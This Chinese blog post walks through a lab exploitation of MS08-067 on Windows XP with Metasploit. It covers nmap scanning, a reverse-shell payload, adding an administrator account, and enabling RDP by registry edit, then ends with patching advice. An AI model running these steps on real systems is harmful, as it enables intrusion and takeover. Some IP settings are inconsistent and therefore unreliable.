持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第6天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情
环境:kali一台 Windows xp
kali使用命令ifconfig Windows 输入ipconfig
确保ip在同一个网段,确保网络可达性
使用nmap命令,nmap -O -n -T4 -p445 --script smb-vuln-ms08-067 192.168.110.26 对ip进行扫描:-O(进行系统扫描) -n(不做DNS解析) -T4(使用4的速度扫描) -p445(针对ip445扫描)
扫描完发现445端口开启,系统为windows XP
启动msf框架
kali输入命令msfconsole进入
使用命令search 08_067查找该漏洞可使用的模块
使用use 选择模块use exploit/windows/ smb/ms08_ 067 netapi
设置RHOST为靶机ip 192.168.110.26
使用命令set payload来设置会连至控制端的载荷模块 set payload windows/shell/reverse_tcp
查看payload需要配置的参数 使用命令show options
发现缺少LHOST渗透机监听的ip
那么就添加一个
使用命令set LHOST 192.168.110.26
使用命令show targets命令来显示漏洞溢出模块exploit所支持的操作系统,软件版本
可选target0(自动选择)或自己选择 本实验目标操作系统编号为34
使用命令check来检查是否存在漏洞
存在那就使用命令exploit开始攻击
攻击成功
使用命令建用户
使用命令net localgroup administrators hack /add 将新用户添加到administrators分组(提升至管理员用户)
使用命令netstat /an查看开启的端口
使用命令
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
开启3389端口
使用rdesktop软件来远程目标靶机,输入用户密码
命令 rdesktop 192.168.110.2
利用 Microsoft Update 服务检查更新。
早到自己的操作系统,下载相对应的补丁包,本次实验的是windows XP SP3